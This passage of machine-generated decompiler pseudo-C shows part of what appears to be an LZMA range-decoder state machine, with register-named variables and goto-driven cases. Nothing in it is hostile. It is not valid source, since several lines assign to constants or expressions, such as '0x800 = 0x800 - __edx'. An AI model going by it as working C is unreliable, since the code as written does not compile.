                                                                                    													__ebx = 1;
                                                                                    													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                    													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                    													goto L41;
                                                                                    												}
                                                                                    											case 7:
                                                                                    												__eflags =  *(__ebp - 0x40) - 1;
                                                                                    												if( *(__ebp - 0x40) != 1) {
                                                                                    													__eax =  *(__ebp - 0x24);
                                                                                    													 *(__ebp - 0x80) = 0x16;
                                                                                    													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                    													__eax =  *(__ebp - 0x28);
                                                                                    													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                    													__eax =  *(__ebp - 0x2c);
                                                                                    													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                    													__eax = 0;
                                                                                    													__eflags =  *(__ebp - 0x38) - 7;
                                                                                    													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                    													__al = __al & 0x000000fd;
                                                                                    													__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                    													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                    													__eax =  *(__ebp - 4);
                                                                                    													__eax =  *(__ebp - 4) + 0x664;
                                                                                    													__eflags = __eax;
                                                                                    													 *(__ebp - 0x58) = __eax;
                                                                                    													goto L69;
                                                                                    												}
                                                                                    												__eax =  *(__ebp - 4);
                                                                                    												__ecx =  *(__ebp - 0x38);
                                                                                    												 *(__ebp - 0x84) = 8;
                                                                                    												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                    												while(1) {
                                                                                    													L132:
                                                                                    													 *(_t613 - 0x54) = _t606;
                                                                                    													goto L133;
                                                                                    												}
                                                                                    											case 8:
                                                                                    												__eflags =  *(__ebp - 0x40);
                                                                                    												if( *(__ebp - 0x40) != 0) {
                                                                                    													__eax =  *(__ebp - 4);
                                                                                    													__ecx =  *(__ebp - 0x38);
                                                                                    													 *(__ebp - 0x84) = 0xa;
                                                                                    													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                    												} else {
                                                                                    													__eax =  *(__ebp - 0x38);
                                                                                    													__ecx =  *(__ebp - 4);
                                                                                    													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                    													 *(__ebp - 0x84) = 9;
                                                                                    													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                    													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                    												}
                                                                                    												while(1) {
                                                                                    													L132:
                                                                                    													 *(_t613 - 0x54) = _t606;
                                                                                    													goto L133;
                                                                                    												}
                                                                                    											case 9:
                                                                                    												__eflags =  *(__ebp - 0x40);
                                                                                    												if( *(__ebp - 0x40) != 0) {
                                                                                    													goto L89;
                                                                                    												}
                                                                                    												__eflags =  *(__ebp - 0x60);
                                                                                    												if( *(__ebp - 0x60) == 0) {
                                                                                    													goto L171;
                                                                                    												}
                                                                                    												__eax = 0;
                                                                                    												__eflags =  *(__ebp - 0x38) - 7;
                                                                                    												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                    												__eflags = _t259;
                                                                                    												0 | _t259 = _t259 + _t259 + 9;
                                                                                    												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                    												goto L76;
                                                                                    											case 0xa:
                                                                                    												goto L0;
                                                                                    											case 0xb:
                                                                                    												__eflags =  *(__ebp - 0x40);
                                                                                    												if( *(__ebp - 0x40) != 0) {
                                                                                    													__ecx =  *(__ebp - 0x24);
                                                                                    													__eax =  *(__ebp - 0x20);
                                                                                    													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                    												} else {
                                                                                    													__eax =  *(__ebp - 0x24);
                                                                                    												}
                                                                                    												__ecx =  *(__ebp - 0x28);
                                                                                    												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                    												goto L88;
                                                                                    											case 0xc:
                                                                                    												L99:
                                                                                    												__eflags =  *(__ebp - 0x6c);
                                                                                    												if( *(__ebp - 0x6c) == 0) {
                                                                                    													 *(__ebp - 0x88) = 0xc;
                                                                                    													goto L170;
                                                                                    												}
                                                                                    												__ecx =  *(__ebp - 0x70);
                                                                                    												__eax =  *(__ebp - 0xc);
                                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												_t334 = __ebp - 0x70;
                                                                                    												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                    												__eflags =  *_t334;
                                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												__eax =  *(__ebp - 0x2c);
                                                                                    												goto L101;
                                                                                    											case 0xd:
                                                                                    												L37:
                                                                                    												__eflags =  *(__ebp - 0x6c);
                                                                                    												if( *(__ebp - 0x6c) == 0) {
                                                                                    													 *(__ebp - 0x88) = 0xd;
                                                                                    													goto L170;
                                                                                    												}
                                                                                    												__ecx =  *(__ebp - 0x70);
                                                                                    												__eax =  *(__ebp - 0xc);
                                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												_t122 = __ebp - 0x70;
                                                                                    												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                    												__eflags =  *_t122;
                                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												L39:
                                                                                    												__eax =  *(__ebp - 0x40);
                                                                                    												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                    												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                    													goto L48;
                                                                                    												}
                                                                                    												__eflags = __ebx - 0x100;
                                                                                    												if(__ebx >= 0x100) {
                                                                                    													goto L54;
                                                                                    												}
                                                                                    												L41:
                                                                                    												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                    												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                    												__ecx =  *(__ebp - 0x58);
                                                                                    												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                    												 *(__ebp - 0x48) = __eax;
                                                                                    												__eax = __eax + 1;
                                                                                    												__eax = __eax << 8;
                                                                                    												__eax = __eax + __ebx;
                                                                                    												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                    												__ax =  *__esi;
                                                                                    												 *(__ebp - 0x54) = __esi;
                                                                                    												__edx = __ax & 0x0000ffff;
                                                                                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                    												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                    												if( *(__ebp - 0xc) >= __ecx) {
                                                                                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                    													__cx = __ax;
                                                                                    													 *(__ebp - 0x40) = 1;
                                                                                    													__cx = __ax >> 5;
                                                                                    													__eflags = __eax;
                                                                                    													__ebx = __ebx + __ebx + 1;
                                                                                    													 *__esi = __ax;
                                                                                    												} else {
                                                                                    													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                    													 *(__ebp - 0x10) = __ecx;
                                                                                    													0x800 = 0x800 - __edx;
                                                                                    													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                    													__ebx = __ebx + __ebx;
                                                                                    													 *__esi = __cx;
                                                                                    												}
                                                                                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    												 *(__ebp - 0x44) = __ebx;
                                                                                    												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    													goto L39;
                                                                                    												} else {
                                                                                    													goto L37;
                                                                                    												}
                                                                                    											case 0xe:
                                                                                    												L46:
                                                                                    												__eflags =  *(__ebp - 0x6c);
                                                                                    												if( *(__ebp - 0x6c) == 0) {
                                                                                    													 *(__ebp - 0x88) = 0xe;
                                                                                    													goto L170;
                                                                                    												}
                                                                                    												__ecx =  *(__ebp - 0x70);
                                                                                    												__eax =  *(__ebp - 0xc);
                                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												_t156 = __ebp - 0x70;
                                                                                    												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                    												__eflags =  *_t156;
                                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												while(1) {
                                                                                    													L48:
                                                                                    													__eflags = __ebx - 0x100;
                                                                                    													if(__ebx >= 0x100) {
                                                                                    														break;
                                                                                    													}
                                                                                    													__eax =  *(__ebp - 0x58);
                                                                                    													__edx = __ebx + __ebx;
                                                                                    													__ecx =  *(__ebp - 0x10);
                                                                                    													__esi = __edx + __eax;
                                                                                    													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                    													__ax =  *__esi;
                                                                                    													 *(__ebp - 0x54) = __esi;
                                                                                    													__edi = __ax & 0x0000ffff;
                                                                                    													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                    													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                    													if( *(__ebp - 0xc) >= __ecx) {
                                                                                    														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                    														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                    														__cx = __ax;
                                                                                    														_t170 = __edx + 1; // 0x1
                                                                                    														__ebx = _t170;
                                                                                    														__cx = __ax >> 5;
                                                                                    														__eflags = __eax;
                                                                                    														 *__esi = __ax;
                                                                                    													} else {
                                                                                    														 *(__ebp - 0x10) = __ecx;
                                                                                    														0x800 = 0x800 - __edi;
                                                                                    														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                    														__ebx = __ebx + __ebx;
                                                                                    														 *__esi = __cx;
                                                                                    													}
                                                                                    													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    													 *(__ebp - 0x44) = __ebx;
                                                                                    													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    														continue;
                                                                                    													} else {
                                                                                    														goto L46;
                                                                                    													}
                                                                                    												}
                                                                                    												L54:
                                                                                    												_t173 = __ebp - 0x34;
                                                                                    												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                    												__eflags =  *_t173;
                                                                                    												goto L55;
                                                                                    											case 0xf:
                                                                                    												L58:
                                                                                    												__eflags =  *(__ebp - 0x6c);
                                                                                    												if( *(__ebp - 0x6c) == 0) {
                                                                                    													 *(__ebp - 0x88) = 0xf;
                                                                                    													goto L170;
                                                                                    												}
                                                                                    												__ecx =  *(__ebp - 0x70);
                                                                                    												__eax =  *(__ebp - 0xc);
                                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												_t203 = __ebp - 0x70;
                                                                                    												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                    												__eflags =  *_t203;
                                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												L60:
                                                                                    												__eflags = __ebx - 0x100;
                                                                                    												if(__ebx >= 0x100) {
                                                                                    													L55:
                                                                                    													__al =  *(__ebp - 0x44);
                                                                                    													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                    													goto L56;
                                                                                    												}
                                                                                    												L61:
                                                                                    												__eax =  *(__ebp - 0x58);
                                                                                    												__edx = __ebx + __ebx;
                                                                                    												__ecx =  *(__ebp - 0x10);
                                                                                    												__esi = __edx + __eax;
                                                                                    												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                    												__ax =  *__esi;
                                                                                    												 *(__ebp - 0x54) = __esi;
                                                                                    												__edi = __ax & 0x0000ffff;
                                                                                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                    												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                    												if( *(__ebp - 0xc) >= __ecx) {
                                                                                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                    													__cx = __ax;
                                                                                    													_t217 = __edx + 1; // 0x1
                                                                                    													__ebx = _t217;
                                                                                    													__cx = __ax >> 5;
                                                                                    													__eflags = __eax;
                                                                                    													 *__esi = __ax;
                                                                                    												} else {
                                                                                    													 *(__ebp - 0x10) = __ecx;
                                                                                    													0x800 = 0x800 - __edi;
                                                                                    													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                    													__ebx = __ebx + __ebx;
                                                                                    													 *__esi = __cx;
                                                                                    												}
                                                                                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    												 *(__ebp - 0x44) = __ebx;
                                                                                    												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    													goto L60;
                                                                                    												} else {
                                                                                    													goto L58;
                                                                                    												}
                                                                                    											case 0x10:
                                                                                    												L109:
                                                                                    												__eflags =  *(__ebp - 0x6c);
                                                                                    												if( *(__ebp - 0x6c) == 0) {
                                                                                    													 *(__ebp - 0x88) = 0x10;
                                                                                    													goto L170;
                                                                                    												}
                                                                                    												__ecx =  *(__ebp - 0x70);
                                                                                    												__eax =  *(__ebp - 0xc);
                                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												_t365 = __ebp - 0x70;
                                                                                    												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                    												__eflags =  *_t365;
                                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												goto L111;
                                                                                    											case 0x11:
                                                                                    												goto L69;
                                                                                    											case 0x12:
                                                                                    												__eflags =  *(__ebp - 0x40);
                                                                                    												if( *(__ebp - 0x40) != 0) {
                                                                                    													__eax =  *(__ebp - 0x58);
                                                                                    													 *(__ebp - 0x84) = 0x13;
                                                                                    													__esi =  *(__ebp - 0x58) + 2;
                                                                                    													while(1) {
                                                                                    														L132:
                                                                                    														 *(_t613 - 0x54) = _t606;
                                                                                    														goto L133;
                                                                                    													}
                                                                                    												}
                                                                                    												__eax =  *(__ebp - 0x4c);
                                                                                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                    												__ecx =  *(__ebp - 0x58);
                                                                                    												__eax =  *(__ebp - 0x4c) << 4;
                                                                                    												__eflags = __eax;
                                                                                    												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                    												goto L130;
                                                                                    											case 0x13:
                                                                                    												__eflags =  *(__ebp - 0x40);
                                                                                    												if( *(__ebp - 0x40) != 0) {
                                                                                    													_t469 = __ebp - 0x58;
                                                                                    													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                    													__eflags =  *_t469;
                                                                                    													 *(__ebp - 0x30) = 0x10;
                                                                                    													 *(__ebp - 0x40) = 8;
                                                                                    													L144:
                                                                                    													 *(__ebp - 0x7c) = 0x14;
                                                                                    													goto L145;
                                                                                    												}
                                                                                    												__eax =  *(__ebp - 0x4c);
                                                                                    												__ecx =  *(__ebp - 0x58);
                                                                                    												__eax =  *(__ebp - 0x4c) << 4;
                                                                                    												 *(__ebp - 0x30) = 8;
                                                                                    												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                    												L130:
                                                                                    												 *(__ebp - 0x58) = __eax;
                                                                                    												 *(__ebp - 0x40) = 3;
                                                                                    												goto L144;
                                                                                    											case 0x14:
                                                                                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                    												__eax =  *(__ebp - 0x80);
                                                                                    												 *(_t613 - 0x88) = _t533;
                                                                                    												goto L1;
                                                                                    											case 0x15:
                                                                                    												__eax = 0;
                                                                                    												__eflags =  *(__ebp - 0x38) - 7;
                                                                                    												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                    												__al = __al & 0x000000fd;
                                                                                    												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                    												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                    												goto L120;
                                                                                    											case 0x16:
                                                                                    												__eax =  *(__ebp - 0x30);
                                                                                    												__eflags = __eax - 4;
                                                                                    												if(__eax >= 4) {
                                                                                    													_push(3);
                                                                                    													_pop(__eax);
                                                                                    												}
                                                                                    												__ecx =  *(__ebp - 4);
                                                                                    												 *(__ebp - 0x40) = 6;
                                                                                    												__eax = __eax << 7;
                                                                                    												 *(__ebp - 0x7c) = 0x19;
                                                                                    												 *(__ebp - 0x58) = __eax;
                                                                                    												goto L145;
                                                                                    											case 0x17:
                                                                                    												L145:
                                                                                    												__eax =  *(__ebp - 0x40);
                                                                                    												 *(__ebp - 0x50) = 1;
                                                                                    												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                    												goto L149;
                                                                                    											case 0x18:
                                                                                    												L146:
                                                                                    												__eflags =  *(__ebp - 0x6c);
                                                                                    												if( *(__ebp - 0x6c) == 0) {
                                                                                    													 *(__ebp - 0x88) = 0x18;
                                                                                    													goto L170;
                                                                                    												}
                                                                                    												__ecx =  *(__ebp - 0x70);
                                                                                    												__eax =  *(__ebp - 0xc);
                                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												_t484 = __ebp - 0x70;
                                                                                    												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                    												__eflags =  *_t484;
                                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    												L148:
                                                                                    												_t487 = __ebp - 0x48;
                                                                                    												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                    												__eflags =  *_t487;
                                                                                    												L149:
                                                                                    												__eflags =  *(__ebp - 0x48);
                                                                                    												if( *(__ebp - 0x48) <= 0) {
                                                                                    													__ecx =  *(__ebp - 0x40);
                                                                                    													__ebx =  *(__ebp - 0x50);
                                                                                    													0 = 1;
                                                                                    													__eax = 1 << __cl;
                                                                                    													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                    													__eax =  *(__ebp - 0x7c);
                                                                                    													 *(__ebp - 0x44) = __ebx;
                                                                                    													while(1) {
                                                                                    														 *(_t613 - 0x88) = _t533;
                                                                                    														goto L1;
                                                                                    													}
                                                                                    												}
                                                                                    												__eax =  *(__ebp - 0x50);
                                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                    												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                    												__eax =  *(__ebp - 0x58);
                                                                                    												__esi = __edx + __eax;
                                                                                    												 *(__ebp - 0x54) = __esi;
                                                                                    												__ax =  *__esi;
                                                                                    												__edi = __ax & 0x0000ffff;
                                                                                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                    												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                    												if( *(__ebp - 0xc) >= __ecx) {
                                                                                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                    													__cx = __ax;
                                                                                    													__cx = __ax >> 5;
                                                                                    													__eax = __eax - __ecx;
                                                                                    													__edx = __edx + 1;
                                                                                    													__eflags = __edx;
                                                                                    													 *__esi = __ax;
                                                                                    													 *(__ebp - 0x50) = __edx;
                                                                                    												} else {
                                                                                    													 *(__ebp - 0x10) = __ecx;
                                                                                    													0x800 = 0x800 - __edi;
                                                                                    													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                    													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                    													 *__esi = __cx;
                                                                                    												}
                                                                                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    													goto L148;
                                                                                    												} else {
                                                                                    													goto L146;
                                                                                    												}
                                                                                    											case 0x19:
                                                                                    												__eflags = __ebx - 4;
                                                                                    												if(__ebx < 4) {
                                                                                    													 *(__ebp - 0x2c) = __ebx;
                                                                                    													L119:
                                                                                    													_t393 = __ebp - 0x2c;
                                                                                    													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                    													__eflags =  *_t393;
                                                                                    													L120:
                                                                                    													__eax =  *(__ebp - 0x2c);
                                                                                    													__eflags = __eax;
                                                                                    													if(__eax == 0) {
                                                                                    														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                    														goto L170;
                                                                                    													}
                                                                                    													__eflags = __eax -  *(__ebp - 0x60);
                                                                                    													if(__eax >  *(__ebp - 0x60)) {
                                                                                    														goto L171;
                                                                                    													}
                                                                                    													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                    													__eax =  *(__ebp - 0x30);
                                                                                    													_t400 = __ebp - 0x60;
                                                                                    													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                    													__eflags =  *_t400;
                                                                                    													goto L123;
                                                                                    												}
                                                                                    												__ecx = __ebx;
                                                                                    												__eax = __ebx;
                                                                                    												__ecx = __ebx >> 1;
                                                                                    												__eax = __ebx & 0x00000001;
                                                                                    												__ecx = (__ebx >> 1) - 1;
                                                                                    												__al = __al | 0x00000002;
                                                                                    												__eax = (__ebx & 0x00000001) << __cl;
                                                                                    												__eflags = __ebx - 0xe;
                                                                                    												 *(__ebp - 0x2c) = __eax;
                                                                                    												if(__ebx >= 0xe) {
                                                                                    													__ebx = 0;
                                                                                    													 *(__ebp - 0x48) = __ecx;
                                                                                    													L102:
                                                                                    													__eflags =  *(__ebp - 0x48);
                                                                                    													if( *(__ebp - 0x48) <= 0) {
                                                                                    														__eax = __eax + __ebx;
                                                                                    														 *(__ebp - 0x40) = 4;
                                                                                    														 *(__ebp - 0x2c) = __eax;
                                                                                    														__eax =  *(__ebp - 4);
                                                                                    														__eax =  *(__ebp - 4) + 0x644;
                                                                                    														__eflags = __eax;
                                                                                    														L108:
                                                                                    														__ebx = 0;
                                                                                    														 *(__ebp - 0x58) = __eax;
                                                                                    														 *(__ebp - 0x50) = 1;
                                                                                    														 *(__ebp - 0x44) = 0;
                                                                                    														 *(__ebp - 0x48) = 0;
                                                                                    														L112:
                                                                                    														__eax =  *(__ebp - 0x40);
                                                                                    														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                    														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                    															_t391 = __ebp - 0x2c;
                                                                                    															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                    															__eflags =  *_t391;
                                                                                    															goto L119;
                                                                                    														}
                                                                                    														__eax =  *(__ebp - 0x50);
                                                                                    														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                    														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                    														__eax =  *(__ebp - 0x58);
                                                                                    														__esi = __edi + __eax;
                                                                                    														 *(__ebp - 0x54) = __esi;
                                                                                    														__ax =  *__esi;
                                                                                    														__ecx = __ax & 0x0000ffff;
                                                                                    														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                    														__eflags =  *(__ebp - 0xc) - __edx;
                                                                                    														if( *(__ebp - 0xc) >= __edx) {
                                                                                    															__ecx = 0;
                                                                                    															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                    															__ecx = 1;
                                                                                    															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                    															__ebx = 1;
                                                                                    															__ecx =  *(__ebp - 0x48);
                                                                                    															__ebx = 1 << __cl;
                                                                                    															__ecx = 1 << __cl;
                                                                                    															__ebx =  *(__ebp - 0x44);
                                                                                    															__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                    															__cx = __ax;
                                                                                    															__cx = __ax >> 5;
                                                                                    															__eax = __eax - __ecx;
                                                                                    															__edi = __edi + 1;
                                                                                    															__eflags = __edi;
                                                                                    															 *(__ebp - 0x44) = __ebx;
                                                                                    															 *__esi = __ax;
                                                                                    															 *(__ebp - 0x50) = __edi;
                                                                                    														} else {
                                                                                    															 *(__ebp - 0x10) = __edx;
                                                                                    															0x800 = 0x800 - __ecx;
                                                                                    															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                    															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                    															 *__esi = __dx;
                                                                                    														}
                                                                                    														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    														if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    															L111:
                                                                                    															_t368 = __ebp - 0x48;
                                                                                    															 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                    															__eflags =  *_t368;
                                                                                    															goto L112;
                                                                                    														} else {
                                                                                    															goto L109;
                                                                                    														}
                                                                                    													}
                                                                                    													__ecx =  *(__ebp - 0xc);
                                                                                    													__ebx = __ebx + __ebx;
                                                                                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                    													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                    													 *(__ebp - 0x44) = __ebx;
                                                                                    													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                    														__ecx =  *(__ebp - 0x10);
                                                                                    														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                    														__ebx = __ebx | 0x00000001;
                                                                                    														__eflags = __ebx;
                                                                                    														 *(__ebp - 0x44) = __ebx;
                                                                                    													}
                                                                                    													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    														L101:
                                                                                    														_t338 = __ebp - 0x48;
                                                                                    														 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                    														__eflags =  *_t338;
                                                                                    														goto L102;
                                                                                    													} else {
                                                                                    														goto L99;
                                                                                    													}
                                                                                    												}
                                                                                    												__edx =  *(__ebp - 4);
                                                                                    												__eax = __eax - __ebx;
                                                                                    												 *(__ebp - 0x40) = __ecx;
                                                                                    												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                    												goto L108;
                                                                                    											case 0x1a:
                                                                                    												L56:
                                                                                    												__eflags =  *(__ebp - 0x64);
                                                                                    												if( *(__ebp - 0x64) == 0) {
                                                                                    													 *(__ebp - 0x88) = 0x1a;
                                                                                    													goto L170;
                                                                                    												}
                                                                                    												__ecx =  *(__ebp - 0x68);
                                                                                    												__al =  *(__ebp - 0x5c);
                                                                                    												__edx =  *(__ebp - 8);
                                                                                    												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                    												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                    												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                    												 *( *(__ebp - 0x68)) = __al;
                                                                                    												__ecx =  *(__ebp - 0x14);
                                                                                    												 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                    												__eax = __ecx + 1;
                                                                                    												__edx = 0;
                                                                                    												_t192 = __eax %  *(__ebp - 0x74);
                                                                                    												__eax = __eax /  *(__ebp - 0x74);
                                                                                    												__edx = _t192;
                                                                                    												goto L80;
                                                                                    											case 0x1b:
                                                                                    												L76:
                                                                                    												__eflags =  *(__ebp - 0x64);
                                                                                    												if( *(__ebp - 0x64) == 0) {
                                                                                    													 *(__ebp - 0x88) = 0x1b;
                                                                                    													goto L170;
                                                                                    												}
